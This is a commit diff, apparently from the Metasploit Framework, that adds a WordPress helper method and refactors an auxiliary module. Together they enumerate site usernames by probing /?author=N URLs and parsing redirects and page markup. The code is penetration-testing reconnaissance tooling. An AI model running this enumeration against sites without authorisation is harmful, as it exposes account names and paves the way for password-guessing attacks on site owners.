more methods
Christian Mehlmauer
parent
68a51f4055
commit
655e2dcf6c
|
|
@ -54,6 +54,10 @@ module Msf
|
|||
normalize_uri(target_uri.path) + "/?p=#{post_id}"
|
||||
end
|
||||
|
||||
def wp_url_author(author_id)
|
||||
normalize_uri(target_uri.path) + "/?author=#{author_id}"
|
||||
end
|
||||
|
||||
# performs a wordpress login
|
||||
# returns the session cookie on successful login, nil otherwise
|
||||
def wp_login(user, pass)
|
||||
|
|
@ -93,6 +97,36 @@ module Msf
|
|||
return exists
|
||||
end
|
||||
|
||||
def wp_userid_exists?(user_id)
|
||||
url = wp_url_author(user_id)
|
||||
res = send_request_cgi({
|
||||
'method' => 'GET',
|
||||
'uri' => url
|
||||
})
|
||||
|
||||
if res and res.code == 301
|
||||
uri = URI(res.headers['Location'])
|
||||
# try to extract username from location
|
||||
if uri.to_s =~ /\/author\/([^\/\b]+)\/?/i
|
||||
return $1
|
||||
end
|
||||
uri = "#{uri.path}?#{uri.query}"
|
||||
res = send_request_cgi({
|
||||
'method' => 'GET',
|
||||
'uri' => uri
|
||||
})
|
||||
end
|
||||
|
||||
if res.nil?
|
||||
print_error("#{target_uri} - Error getting response.")
|
||||
elsif res.code == 200 and
|
||||
(res.body =~ /href="http[s]*:\/\/.*\/\?*author.+title="([[:print:]]+)" /i or
|
||||
res.body =~ /<body class="archive author author-(?:[^\s]+) author-(?:\d+)/i)
|
||||
return $1
|
||||
end
|
||||
return nil
|
||||
end
|
||||
|
||||
def wp_post_comment_auth(comment, comment_post_id, login_cookie)
|
||||
_wp_post_comment(comment, comment_post_id, login_cookie, nil, nil, nil)
|
||||
end
|
||||
|
|
|
|||
|
|
@ -49,12 +49,13 @@ class Metasploit3 < Msf::Auxiliary
|
|||
|
||||
usernames = []
|
||||
if datastore['ENUMERATE_USERNAMES']
|
||||
vprint_status("#{target_uri} - WordPress Enumeration - Running User Enumeration")
|
||||
usernames = enum_usernames
|
||||
end
|
||||
|
||||
if datastore['VALIDATE_USERS']
|
||||
@users_found = {}
|
||||
vprint_status("#{target_uri} - WordPress Enumeration - Running User Enumeration")
|
||||
vprint_status("#{target_uri} - WordPress Enumeration - Running User validation")
|
||||
each_user_pass { |user, pass|
|
||||
do_enum(user)
|
||||
}
|
||||
|
|
@ -144,32 +145,10 @@ class Metasploit3 < Msf::Auxiliary
|
|||
def enum_usernames
|
||||
usernames = []
|
||||
for i in datastore['RANGE_START']..datastore['RANGE_END']
|
||||
uri = "#{target_uri}?author=#{i}"
|
||||
print_status "#{target_uri} - Requesting #{uri}"
|
||||
res = send_request_cgi({
|
||||
'method' => 'GET',
|
||||
'uri' => uri
|
||||
})
|
||||
|
||||
if (res and res.code == 301)
|
||||
uri = URI(res.headers['Location'])
|
||||
uri = "#{uri.path}?#{uri.query}"
|
||||
res = send_request_cgi({
|
||||
'method' => 'GET',
|
||||
'uri' => uri
|
||||
})
|
||||
end
|
||||
|
||||
if res.nil?
|
||||
print_error("#{target_uri} - Error getting response.")
|
||||
elsif res.code == 200 and res.body =~ /href="http[s]*:\/\/.*\/\?*author.+title="([[:print:]]+)" /i
|
||||
username = $1
|
||||
username = wp_userid_exists?(i)
|
||||
if username
|
||||
print_good "#{target_uri} - Found user '#{username}' with id #{i.to_s}"
|
||||
usernames << username
|
||||
elsif res.code == 404
|
||||
print_status "#{target_uri} - No user with id #{i.to_s} found"
|
||||
else
|
||||
print_error "#{target_uri} - Unknown error. HTTP #{res.code.to_s}"
|
||||
end
|
||||
end
|
||||
|
||||
|
|
|
|||
Loading…
Reference in New Issue